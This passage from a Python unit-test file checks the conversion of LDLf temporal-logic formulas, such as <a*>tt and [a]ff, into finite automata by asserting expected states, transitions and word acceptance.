self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_a_tt(self):
"""<a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_star_a_tt = PathExpressionEventually(PathExpressionStar(atomic_a), tt)
x = self.ldlf_a.to_nfa(eventually_star_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_star_a_tt}), frozenset(), frozenset()),
(frozenset({eventually_star_a_tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([eventually_star_a_tt])}
initial_state = {frozenset([eventually_star_a_tt])}
states = {frozenset(), frozenset([eventually_star_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000016_alphabet_a_eventually_star_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000016_alphabet_a_eventually_star_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_a_ff(self):
"""<a*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
ff = LogicalFalse()
eventually_star_a_ff = PathExpressionEventually(PathExpressionStar(atomic_a), ff)
x = self.ldlf_a.to_nfa(eventually_star_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_star_a_ff}), frozenset({a}), frozenset({eventually_star_a_ff})),
}
final_states = {frozenset()}
initial_state = {frozenset([eventually_star_a_ff])}
states = {frozenset(), frozenset([eventually_star_a_ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000017_alphabet_a_eventually_star_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000017_alphabet_a_eventually_star_a_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertFalse(dfa.word_acceptance([a_, not_, a_]))
self.assertFalse(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_not_a_tt(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_star_not_a_tt = PathExpressionEventually(PathExpressionStar(Not(atomic_a)), tt)
x = self.ldlf_a.to_nfa(eventually_star_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_star_not_a_tt}), frozenset(), frozenset()),
(frozenset({eventually_star_not_a_tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([eventually_star_not_a_tt])}
initial_state = {frozenset([eventually_star_not_a_tt])}
states = {frozenset(), frozenset([eventually_star_not_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000018_alphabet_a_eventually_star_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000018_alphabet_a_eventually_star_not_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_not_a_ff(self):
"""<a*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
ff = LogicalFalse()
eventually_star_a_not_ff = PathExpressionEventually(PathExpressionStar(Not(atomic_a)), ff)
x = self.ldlf_a.to_nfa(eventually_star_a_not_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_star_a_not_ff}), frozenset(), frozenset({eventually_star_a_not_ff})),
}
final_states = {frozenset()}
initial_state = {frozenset([eventually_star_a_not_ff])}
states = {frozenset(), frozenset([eventually_star_a_not_ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000019_alphabet_a_eventually_star_not_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000019_alphabet_a_eventually_star_not_a_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertFalse(dfa.word_acceptance([a_, not_, a_]))
self.assertFalse(dfa.word_acceptance([a_, not_, not_]))
def test_to_nfa_alphabet_a_eventually_star_not_a_a(self):
"""<not-a*>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_star_not_a_a = PathExpressionEventually(PathExpressionStar(Not(atomic_a)), atomic_a)
expanded_eventually_star_not_a_a = PathExpressionEventually(PathExpressionStar(Not(atomic_a)), PathExpressionEventually(atomic_a, tt))
x = self.ldlf_a.to_nfa(eventually_star_not_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({expanded_eventually_star_not_a_a}), frozenset(), frozenset({expanded_eventually_star_not_a_a})),
(frozenset({expanded_eventually_star_not_a_a}), frozenset({a}), frozenset({tt})),
}
final_states = {frozenset(), frozenset({tt})}
initial_state = {frozenset([expanded_eventually_star_not_a_a])}
states = {frozenset(), frozenset([expanded_eventually_star_not_a_a]), frozenset({tt})}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000020_alphabet_a_eventually_star_not_a_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000020_alphabet_a_eventually_star_not_a_a.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_]))
self.assertTrue(dfa.word_acceptance([not_, not_, not_, a_]))
def test_to_nfa_alphabet_a_eventually_star_sequence_not_a_true_a(self):
"""<not-a;T*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
seq = PathExpressionSequence(Not(atomic_a), TrueFormula())
star = PathExpressionStar(seq)
eventually_star_sequence_not_a_true_a = PathExpressionEventually(star, atomic_a)
expanded_eventually_star_sequence_not_a_true_a = PathExpressionEventually(star, PathExpressionEventually(atomic_a, tt))
eventually_true_eventually_star_sequence_not_a_true_a = PathExpressionEventually(TrueFormula(), expanded_eventually_star_sequence_not_a_true_a)
x = self.ldlf_a.to_nfa(eventually_star_sequence_not_a_true_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_true_eventually_star_sequence_not_a_true_a}), frozenset(), frozenset({expanded_eventually_star_sequence_not_a_true_a})),
(frozenset({eventually_true_eventually_star_sequence_not_a_true_a}), frozenset({a}), frozenset({expanded_eventually_star_sequence_not_a_true_a})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({expanded_eventually_star_sequence_not_a_true_a}), frozenset(), frozenset({eventually_true_eventually_star_sequence_not_a_true_a})),
(frozenset({expanded_eventually_star_sequence_not_a_true_a}), frozenset({a}), frozenset({tt}))
}
final_states = {frozenset(), frozenset({tt})}
initial_state = {frozenset([expanded_eventually_star_sequence_not_a_true_a])}
states = {frozenset(),
frozenset({eventually_true_eventually_star_sequence_not_a_true_a}),
frozenset({tt}),
frozenset({expanded_eventually_star_sequence_not_a_true_a})
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000021_alphabet_a_eventually_star_sequence_not_a_true_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000021_alphabet_a_eventually_star_sequence_not_a_true_a.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_]))
self.assertTrue(dfa.word_acceptance([not_, not_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_, a_]))
self.assertTrue(dfa.word_acceptance([not_, not_, a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, not_, a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_, a_]))
self.assertTrue(dfa.word_acceptance([not_, a_, not_, not_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_, a_, not_]))
def test_to_nfa_alphabet_a_eventually_star_sequence_not_a_a_a(self):
"""<not-a;a*>ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
seq = PathExpressionSequence(Not(atomic_a), atomic_a)
star = PathExpressionStar(seq)
eventually_star_sequence_not_a_a_a = PathExpressionEventually(star, atomic_a)
expanded_eventually_star_sequence_not_a_a_a = PathExpressionEventually(star, PathExpressionEventually(atomic_a, tt))
eventually_a_eventually_star_sequence_not_a_a_a = PathExpressionEventually(atomic_a, expanded_eventually_star_sequence_not_a_a_a)
x = self.ldlf_a.to_nfa(eventually_star_sequence_not_a_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_a_eventually_star_sequence_not_a_a_a}), frozenset({a}), frozenset({expanded_eventually_star_sequence_not_a_a_a})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({expanded_eventually_star_sequence_not_a_a_a}), frozenset(), frozenset({eventually_a_eventually_star_sequence_not_a_a_a})),
(frozenset({expanded_eventually_star_sequence_not_a_a_a}), frozenset({a}), frozenset({tt}))
}
final_states = {frozenset(), frozenset({tt})}
initial_state = {frozenset([expanded_eventually_star_sequence_not_a_a_a])}
states = {frozenset(),
frozenset({eventually_a_eventually_star_sequence_not_a_a_a}),
frozenset({tt}),
frozenset({expanded_eventually_star_sequence_not_a_a_a})
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000022_alphabet_a_eventually_star_sequence_not_a_a_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000022_alphabet_a_eventually_star_sequence_not_a_a_a.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, not_, a_]))
self.assertFalse(dfa.word_acceptance([not_, not_, a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, not_, a_, a_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, not_, a_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, not_, a_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_, not_]))
self.assertTrue(dfa.word_acceptance([a_, a_, a_, a_]))
def test_to_nfa_alphabet_a_eventually_star_sequence_a_not_a_a(self):
"""<a;not-a*>a"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
seq = PathExpressionSequence(atomic_a, Not(atomic_a))
star = PathExpressionStar(seq)
eventually_star_sequence_not_a_a_a = PathExpressionEventually(star, atomic_a)
expanded_eventually_star_sequence_not_a_a_a = PathExpressionEventually(star, PathExpressionEventually(atomic_a, tt))
eventually_not_a_eventually_star_sequence_not_a_a_a = PathExpressionEventually(Not(atomic_a), expanded_eventually_star_sequence_not_a_a_a)
x = self.ldlf_a.to_nfa(eventually_star_sequence_not_a_a_a)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_not_a_eventually_star_sequence_not_a_a_a}), frozenset(), frozenset({expanded_eventually_star_sequence_not_a_a_a})),
(frozenset({expanded_eventually_star_sequence_not_a_a_a}), frozenset({a}), frozenset({eventually_not_a_eventually_star_sequence_not_a_a_a})),
(frozenset({expanded_eventually_star_sequence_not_a_a_a}), frozenset({a}), frozenset({tt}))
}
final_states = {frozenset(), frozenset({tt})}
initial_state = {frozenset([expanded_eventually_star_sequence_not_a_a_a])}
states = {frozenset(),
frozenset({eventually_not_a_eventually_star_sequence_not_a_a_a}),
frozenset({tt}),
frozenset({expanded_eventually_star_sequence_not_a_a_a})
}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000023_alphabet_a_eventually_star_sequence_not_a_a_a.NFA", "./tests/automata/nfa")
print_dfa(x, "000023_alphabet_a_eventually_star_sequence_not_a_a_a.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_always_a_ff(self):
"""[a]ff"""
a = self.a_sym
ff = LogicalFalse()
always_a_ff = PathExpressionAlways(AtomicFormula(a), ff)
x = self.ldlf_a.to_nfa(always_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([always_a_ff]), frozenset({a}), frozenset({ff})),
(frozenset([always_a_ff]), frozenset(), frozenset()),
}
final_states = {frozenset(), frozenset([always_a_ff])}
initial_state = {frozenset([always_a_ff])}
states = {frozenset([always_a_ff]), frozenset([ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000024_alphabet_a_always_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000024_alphabet_a_always_a_ff.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_propositional_false(self):
a = self.a_sym
tt = LogicalTrue()
always_false_tt = PathExpressionAlways(FalseFormula(), tt)
pl = PL(self.ldlf_a.alphabet)
expanded_false = pl.expand_formula(FalseFormula())
expanded_always_false_tt = PathExpressionAlways(expanded_false, tt)
x = self.ldlf_a.to_nfa(always_false_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([expanded_always_false_tt]), frozenset(), frozenset()),
(frozenset([expanded_always_false_tt]), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([expanded_always_false_tt])}
initial_state = {frozenset([expanded_always_false_tt])}
states = {frozenset([expanded_always_false_tt]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000025_alphabet_a_always_false_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000025_alphabet_a_always_false_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_propositional_true(self):
a = self.a_sym
tt = LogicalTrue()
always_true_tt = PathExpressionAlways(TrueFormula(), tt)
x = self.ldlf_a.to_nfa(always_true_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({always_true_tt}), frozenset(), frozenset({tt})),
(frozenset({always_true_tt}), frozenset({a}), frozenset({tt})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([tt]), frozenset([always_true_tt])}
initial_state = {frozenset([always_true_tt])}
states = {frozenset(), frozenset([always_true_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000026_alphabet_a_always_true_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000026_alphabet_a_always_true_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_propositional_not_a(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_not_a_tt = PathExpressionAlways(Not(atomic_a), tt)
x = self.ldlf_a.to_nfa(always_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({always_not_a_tt}), frozenset(), frozenset({tt})),
(frozenset({always_not_a_tt}), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([tt]), frozenset({always_not_a_tt})}
initial_state = {frozenset([always_not_a_tt])}
states = {frozenset(), frozenset([always_not_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000027_alphabet_a_always_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000027_alphabet_a_always_not_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_a_tt(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_a_tt = PathExpressionAlways(atomic_a, tt)
x = self.ldlf_a.to_nfa(always_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({always_a_tt}), frozenset({a}), frozenset({tt})),
(frozenset({always_a_tt}), frozenset(), frozenset()),
}
final_states = {frozenset(), frozenset([tt]), frozenset({always_a_tt})}
initial_state = {frozenset([always_a_tt])}
states = {frozenset(), frozenset([always_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000028_alphabet_a_always_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000028_alphabet_a_always_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_test_a_tt(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_test_a_tt = PathExpressionAlways(PathExpressionTest(atomic_a), tt)
expanded_always_test_a_tt = PathExpressionAlways(PathExpressionTest(PathExpressionEventually(atomic_a, tt)), tt)
x = self.ldlf_a.to_nfa(always_test_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({expanded_always_test_a_tt}), frozenset({a}), frozenset()),
(frozenset({expanded_always_test_a_tt}), frozenset(), frozenset())
}
final_states = {frozenset(), frozenset([expanded_always_test_a_tt])}
initial_state = {frozenset([expanded_always_test_a_tt])}
states = {frozenset(), frozenset([expanded_always_test_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000029_alphabet_a_always_test_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000029_alphabet_a_always_test_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_test_a_ff(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
ff = LogicalFalse()
always_test_a_ff = PathExpressionAlways(PathExpressionTest(atomic_a), ff)
expanded_always_test_a_ff = PathExpressionAlways(PathExpressionTest(PathExpressionEventually(atomic_a, tt)), ff)
x = self.ldlf_a.to_nfa(always_test_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({expanded_always_test_a_ff}), frozenset(), frozenset()),
(frozenset({expanded_always_test_a_ff}), frozenset({a}), frozenset({ff})),
}
final_states = {frozenset(), frozenset({expanded_always_test_a_ff})}
initial_state = {frozenset([expanded_always_test_a_ff])}
states = {frozenset(), frozenset([expanded_always_test_a_ff]), frozenset([ff])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000030_alphabet_a_always_test_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000030_alphabet_a_always_test_a_ff.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_sequence_a_not_a_tt(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_sequence_a_not_a_tt = PathExpressionAlways(PathExpressionSequence(atomic_a, Not(atomic_a)), tt)
always_not_a_tt = PathExpressionAlways(Not(atomic_a), tt)
x = self.ldlf_a.to_nfa(always_sequence_a_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({always_not_a_tt}), frozenset(), frozenset({tt})),
(frozenset({always_not_a_tt}), frozenset({a}), frozenset({})),
(frozenset({always_sequence_a_not_a_tt}), frozenset({a}), frozenset({always_not_a_tt})),
(frozenset({always_sequence_a_not_a_tt}), frozenset({}), frozenset({})),
}
final_states = {frozenset(), frozenset([tt]), frozenset([always_sequence_a_not_a_tt]), frozenset([always_not_a_tt])}
initial_state = {frozenset([always_sequence_a_not_a_tt])}
states = {frozenset(), frozenset([always_sequence_a_not_a_tt]), frozenset([always_not_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000031_alphabet_a_always_sequence_a_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000031_alphabet_a_always_sequence_a_not_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_a_tt(self):
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
always_star_a_tt = PathExpressionAlways(PathExpressionStar(atomic_a), tt)
x = self.ldlf_a.to_nfa(always_star_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({always_star_a_tt}), frozenset(), frozenset()),
(frozenset({always_star_a_tt}), frozenset({a}), frozenset({always_star_a_tt})),
}
final_states = {frozenset(), frozenset([always_star_a_tt])}
initial_state = {frozenset([always_star_a_tt])}
states = {frozenset(), frozenset([always_star_a_tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000032_alphabet_a_always_star_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000032_alphabet_a_always_star_a_tt.DFA", "./tests/automata/dfa")
def test_to_nfa_alphabet_a_always_star_a_ff(self):
"""[a*]ff"""
a = self.a_sym
atomic_a = AtomicFormula(a)
ff = LogicalFalse()
